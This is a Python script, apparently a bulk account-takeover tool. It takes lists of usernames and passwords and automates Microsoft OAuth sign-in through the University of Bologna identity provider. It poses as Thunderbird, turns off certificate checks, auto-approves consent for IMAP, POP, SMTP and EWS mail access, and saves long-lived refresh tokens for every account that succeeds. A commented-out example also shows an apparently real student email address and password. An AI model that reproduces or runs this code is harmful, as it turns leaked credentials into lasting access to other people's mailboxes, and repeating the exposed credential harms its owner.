import concurrent.futures import json import os import re import threading from datetime import datetime import httpx from bs4 import BeautifulSoup from urllib.parse import urljoin, urlencode from loguru import logger # logger.stop() # 定义线程安全计数器和锁 success_counter = 0 error_counter = 0 # 定义文件名 filename = user-当前月份-日期.txt current_date = datetime.now().strftime("%m-%d") # filename = f'user-{current_date}.txt' counter_lock = threading.Lock() success_file_lock = threading.Lock() error_file_lock = threading.Lock() class OAuth2Authenticator: def __init__(self, username, password): self.username = username self.password = password self.client_id = '9e5f94bc-e8a4-4e73-b8be-63364c29d753' self.session = httpx.Client(timeout=30.0, follow_redirects=True, verify=False) self.base_urls = { 'microsoft': 'https://login.microsoftonline.com', 'idp': 'https://idp.unibo.it' } self.current_state = {} # 用于存储流程中的临时数据 def _extract_input_value(self, html, name): """从HTML中提取指定名称的input值""" soup = BeautifulSoup(html, 'html.parser') element = soup.find('input', {'name': name}) return element['value'] if element else None def _make_request(self, method, url, data=None, **kwargs): """封装请求方法,统一处理异常""" try: # 设置默认的请求头 self.session.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Thunderbird/137.0', # 'Accept': 'application/json, text/javascript, */*; q=0.01', # 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', # 'X-Requested-With': 'XMLHttpRequest' } response = self.session.request(method, url, data=data, **kwargs) url = response.url print(f"请求的URL: {url}") # response.raise_for_status() return response except httpx.ConnectError as e: # print(f"连接失败的目标URL: {e.request.url}") # print(f"错误详情: {e}") raise ValueError(e.request.url) except Exception as e: print(f"其他错误: {e}") raise def _build_auth_url(self): """构建初始认证URL""" params = { 'response_type': 'code', 'client_id': self.client_id, 'redirect_uri': 'https://localhost', 'scope': 'https://outlook.office.com/EWS.AccessAsUser.All https://outlook.office.com/IMAP.AccessAsUser.All https://outlook.office.com/POP.AccessAsUser.All https://outlook.office.com/SMTP.Send offline_access', 'login_hint': self.username } return f"{self.base_urls['microsoft']}/common/oauth2/v2.0/authorize?{urlencode(params)}" def step1_get_initial_login_page(self): """第一步: 获取初始登录页面并提取SAML参数""" logger.info("执行第一步: 获取初始登录页面") auth_url = self._build_auth_url() response = self._make_request('GET', auth_url) # self.current_state['relay_state'] = self._extract_input_value(response.text, 'RelayState') # self.current_state['saml_request'] = self._extract_input_value(response.text, 'SAMLRequest') # if not all([self.current_state['relay_state'], self.current_state['saml_request']]): # raise ValueError("无法从登录页面提取必要的SAML参数") config_match = re.search(r'\$Config=({.*?//])', response.text, re.DOTALL) if config_match: config_value = config_match.group(1).replace('//]', '').strip() self.current_state['config'] = json.loads(config_value[:-1]) else: raise ValueError("无法从响应中提取配置信息") return response def step2_submit_saml_request(self): """第二步: 提交SAML请求到IDP""" logger.info("执行第二步: 提交SAML请求到IDP") data = { "UserName": self.username, "Password": self.password, "AuthMethod": "FormsAuthentication" } idp_sso_url = self.current_state['config'].get('bsso').get('failureRedirectUrl') logger.info(f"IDP SSO URL: {idp_sso_url}") response = self._make_request('POST', idp_sso_url, data=data) # 提取配置信息 logger.info(f"LAST URL: {response.url}") self.current_state['wa'] = self._extract_input_value(response.text, 'wa') self.current_state['wresult'] = self._extract_input_value(response.text, 'wresult') self.current_state['wctx'] = self._extract_input_value(response.text, 'wctx') # if not self.current_state['csrf_token']: # raise ValueError("无法从响应中提取CSRF令牌") return response def step3_submit_loginsrf_response(self): """第三步: 提交登录响应""" logger.info("执行第三步: 提交登录响应") response = self._make_request('POST', urljoin(self.base_urls['microsoft'], '/login.srf'), data={ "wa": self.current_state['wa'], "wresult": self.current_state['wresult'], "wctx": self.current_state['wctx'] } ) config_match = re.search(r'\$Config=({.*?//])', response.text, re.DOTALL) if config_match: config_value = config_match.group(1).replace('//]', '').strip() self.current_state['config'] = json.loads(config_value[:-1]) else: raise ValueError("无法从响应中提取配置信息") return response def step6_submit_saml_response(self): """第六步: 处理授权同意""" logger.info("执行第六步: 处理授权同意") if 'config' not in self.current_state: raise ValueError("缺少配置信息") config = self.current_state['config'] response = self._make_request('POST', urljoin(self.base_urls['microsoft'], '/appverify'), data={ "ContinueAuth": True, "ctx": config.get("sCtx"), "hpgrequestid": config.get("sessionId"), "flowToken": config.get("sFT"), "iscsrfspeedbump": True, "canary": config.get("canary"), "i19": 492026 } ) # 提取配置信息 config_match = re.search(r'\$Config=({.*?//])', response.text, re.DOTALL) if config_match: config_value = config_match.group(1).replace('//]', '').strip() self.current_state['config'] = json.loads(config_value[:-1]) else: raise ValueError("无法从响应中提取配置信息") return response def step7_handle_consent(self): """第七步: 处理授权同意""" logger.info("执行第七步: 处理授权同意") if 'config' not in self.current_state: raise ValueError("缺少配置信息") config = self.current_state['config'] response = self._make_request('POST', urljoin(self.base_urls['microsoft'], '/common/Consent/Set'), data={ "acceptConsent": True, "ctx": config.get("sCtx"), "hpgrequestid": config.get("sessionId"), "flowToken": config.get("sFT"), "canary": config.get("canary"), "i19": 958761 } ) if 'localhost/?code=' in response.url: self.current_state['auth_code'] = self._extract_auth_code(response.url) return response raise ValueError("未能成功获取授权码") def _extract_auth_code(self, url): """从URL中提取授权码""" logger.info(f'提取授权码: {url}') url = str(url) match = re.search(r'code=([^&]+)', url) return match.group(1) if match else None def get_refresh_token(self, code): """获取刷新令牌""" url = "https://login.microsoftonline.com/common/oauth2/v2.0/token" data = { 'client_id': self.client_id, 'grant_type': 'authorization_code', 'redirect_uri': 'https://localhost', 'code': code } response = self._make_request('POST', url, data=data) response_data = response.json() if 'error' in response_data: raise ValueError(f"获取刷新令牌失败: {response_data['error_description']}") refresh_token = response_data.get('refresh_token') access_token = response_data.get('access_token') return refresh_token, access_token def execute_flow(self): """执行完整的OAuth2认证流程""" try: # 更新每一步的last_url response = self.step1_get_initial_login_page() self.current_state['last_url'] = response.url response = self.step2_submit_saml_request() self.current_state['last_url'] = response.url response = self.step3_submit_loginsrf_response() self.current_state['last_url'] = response.url response = self.step6_submit_saml_response() self.current_state['last_url'] = response.url response = self.step7_handle_consent() self.current_state['last_url'] = response.url if 'auth_code' in self.current_state: return self.current_state['auth_code'] raise Exception("认证流程未完成") except Exception as e: code = self._extract_auth_code(e) if code: # logger.info(f"提取到的授权码: {code}") return code else: logger.info(f"认证流程出错: {e}") logger.info("未能提取到授权码") raise def handle_success(username, original_line_new): """处理成功账号,线程安全地写入文件并更新计数器""" global success_counter try: with success_file_lock: with open(success_file, 'a', encoding='utf-8') as file: file.write(original_line_new + '\n') with counter_lock: success_counter += 1 current_count = success_counter logger.info(f"{username} 已写入成功文件,当前成功数: {success_counter},当前失败数: {error_counter}") except Exception as e: logger.error(f"写入成功账号 {username} 时出错: {str(e)}") def handle_failure(username, original_line): """处理失败账号,线程安全地写入文件并更新计数器""" global error_counter try: with error_file_lock: with open(error_file, 'a', encoding='utf-8') as file: file.write(original_line + '\n') with counter_lock: error_counter += 1 current_count = error_counter logger.info(f"{username} 已写入失败文件,当前成功数: {success_counter},当前失败数: {error_counter}") except Exception as e: logger.error(f"写入失败账号 {username} 时出错: {str(e)}") def read_user_credentials(filepath='user.txt'): """从user.txt文件中读取用户名和密码""" credentials = [] try: with open(filepath, 'r', encoding='utf-8') as file: for line in file: parts = line.strip().split('---') if len(parts) >= 3: # 至少需要时间、用户名和密码 timestamp = parts[0] username = parts[1] password = parts[2] email = parts[3] if len(parts) > 3 else "" credentials.append((username, password, email, line.strip())) logger.info(f"成功从{filepath}读取了{len(credentials)}个账号信息") return credentials except Exception as e: logger.error(f"读取凭据文件时出错: {str(e)}") return [] def ensure_files_exist(): """确保输出文件存在""" files = [success_file, error_file] for file in files: try: if not os.path.exists(file): with open(file, 'w', encoding='utf-8') as f: pass logger.info(f"创建文件 {file}") except Exception as e: logger.error(f"创建文件 {file} 时出错: {str(e)}") return False return True def main_threaded(username, password, original_line): authenticator = OAuth2Authenticator( username=username, password=password, # 实际使用时应从安全来源获取密码 ) try: auth_code = authenticator.execute_flow() refresh_token, access_token = authenticator.get_refresh_token(auth_code) print(f"成功获取授权码:\n{auth_code}\n{refresh_token}\n{access_token}\n") # 报错 original_line_new = f'{original_line}---{refresh_token}' handle_success(username, original_line_new) except Exception as e: print(f"认证失败: {e}") handle_failure(username, original_line) # 使用示例 if __name__ == "__main__": # authenticator = OAuth2Authenticator( # username='olga.palmieri@studio.unibo.it', # password='W17M&HQK^x1q7h.', # 实际使用时应从安全来源获取密码 # ) # # try: # auth_code = authenticator.execute_flow() # refresh_token, access_token = authenticator.get_refresh_token(auth_code) # print(f"成功获取授权码:\n{auth_code}\n{refresh_token}\n{access_token}\n") # except Exception as e: # print(f"认证失败: {e}") filename = 'user-4-21-success.txt' success_file = filename.replace('success.txt', 'refresh-success.txt') error_file = filename.replace('error.txt', 'refresh-error.txt') filepath = filename credentials = read_user_credentials(filepath) if not credentials: logger.error("没有读取到有效凭据,退出程序") exit(1) # 确保输出文件存在 if not ensure_files_exist(): logger.error("创建输出文件失败,退出程序") exit(1) # 设置最大线程数 max_workers = 1 # 可以根据需要调整线程数量 logger.info(f"开始多线程处理账号,最大并发数: {max_workers}") # 使用线程池处理账号 with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor: # 提交所有任务 futures = [] for username, password, email, original_line in credentials: # 提交任务到线程池 future = executor.submit( main_threaded, username, password, original_line ) futures.append(future) # 等待所有任务完成 for future in concurrent.futures.as_completed(futures): try: future.result() # 获取结果,但我们不需要处理 except Exception as e: logger.error(f"执行任务时发生异常: {str(e)}") logger.info(f"处理完成,共成功 {success_counter} 个账号,失败 {error_counter} 个账号。")